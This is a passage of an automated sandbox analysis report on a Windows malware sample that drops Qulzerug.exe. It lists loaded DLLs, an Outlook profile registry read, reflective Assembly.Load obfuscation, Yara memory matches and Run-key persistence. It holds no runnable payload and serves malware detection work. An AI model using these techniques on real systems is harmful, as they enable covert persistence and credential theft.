                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: 6Ek4nfs2y1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 6Ek4nfs2y1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.0000000002A98000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.0000000002A98000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: 6Ek4nfs2y1.exe, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                  Source: Qulzerug.exe.0.dr, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.6Ek4nfs2y1.exe.2d3b804.3.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.5860000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4a24a70.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6a9e080.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.644f058.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.2e59a88.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.2b9c980.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.49fca50.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.2b9c980.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.29485bc.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.2e59a88.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.29485bc.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.687f060.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.687f060.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6660040.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1299183493.0000000005860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1552321721.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 0_2_084C30D8 push esi; retn 0000h0_2_084C30D9
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 0_2_084C61B6 push cs; iretd 0_2_084C61B7
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_015850DE pushad ; retf 8_2_015850E4
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B7E2BF push es; iretd 8_2_06B7E324
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B72FE2 push es; iretd 8_2_06B72FF4
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B77BD9 push 8BFFFFFFh; retf 8_2_06B77BDF
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B7E332 push es; iretd 8_2_06B7E324
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B7573F push 8B000003h; iretd 8_2_06B75744
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B7E320 push es; iretd 8_2_06B7E324
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B7E840 push es; ret 8_2_06B7E850
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 9_2_086230D8 push esi; retn 0000h9_2_086230D9
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 9_2_086261B6 push cs; iretd 9_2_086261B7
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 11_2_080830D8 push esi; retn 0000h11_2_080830D9
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 11_2_080861B6 push cs; iretd 11_2_080861B7
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_01612F2E push es; ret 12_2_01612ED5
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D50C78 pushad ; ret 12_2_06D50D02
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D50C69 pushad ; ret 12_2_06D50C6A
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DE2ECB push es; retf 12_2_06DE2F78
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DE2E74 push es; retf 12_2_06DE2F78
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEF608 push esi; ret 12_2_06DEFB36
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DE2F4B push es; retf 12_2_06DE2F78
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DE2F79 push es; iretd 12_2_06DE2FF4
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DE573D push 8B000003h; iretd 12_2_06DE5744
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEFCD3 push edi; ret 12_2_06DEFCDA
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEFCE0 push edi; ret 12_2_06DEFD3A
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEF5A8 push esp; ret 12_2_06DEF5FA
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEC50B push es; ret 12_2_06DEC514
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEC508 pushfd ; ret 12_2_06DEC509
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DE3D09 push es; iretd 12_2_06DE3D0C
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEFD3B push edi; ret 12_2_06DEFD42
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEE26F push es; iretd 12_2_06DEE324
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeFile created: C:\Users\user\AppData\Roaming\Qulzerug.exeJump to dropped file
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QulzerugJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QulzerugJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
